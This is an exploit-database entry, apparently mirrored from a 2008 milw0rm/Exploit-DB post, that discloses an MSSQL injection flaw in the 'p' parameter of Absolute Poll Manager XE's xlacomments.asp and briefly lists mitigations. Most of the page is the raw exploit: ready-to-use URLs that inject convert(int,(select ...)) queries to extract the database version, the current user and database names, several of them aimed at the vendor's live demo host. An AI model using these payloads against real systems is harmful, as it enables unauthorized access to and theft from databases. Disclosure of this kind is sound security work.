header-logo
Suggest Exploit
vendor:
Absolute Poll Manager XE
by:
Hakxer
7.5
CVSS
HIGH
SQL Injection
CWE
Product Name: Absolute Poll Manager XE
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2008

Absolute Poll Manager XE SQL Injection

The Absolute Poll Manager XE script is vulnerable to SQL injection. An attacker can exploit this vulnerability by injecting SQL queries into the 'p' parameter in the xlacomments.asp file. This can lead to unauthorized access, data manipulation, and other malicious activities.

Mitigation:

The vendor should release a patch to fix the SQL injection vulnerability. In the meantime, users are advised to sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

###############################################################################################
# Author : Hakxer
# Home : Www.educ-up.com
# Type Gap : Sql injection --((MSSQL Injection))--
# script : Absolute Poll Manager XE  [see script] http://www.xigla.com/absolutepm/demo.htm
# Greetz : Allah , Egyptian x Hacker , Soufiane , Sinaritx , SQL_inj4ct0r , Stealth , Kof2002 
# TM : EgY Coders 
#################################################################################################

### POC 
www.site.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

### Exploit : 

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+@@version))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+user))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(1)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(2)))

http://www.xigla.com/absolutepm/xlaabsolutepm/xlacomments.asp?p=convert(int,(select+db_name(3)))

###############################################################################

-------------------------------- The End of Gap -----------------------------------

# milw0rm.com [2008-10-11]

Navigation

Suggest Exploit

Services By CQR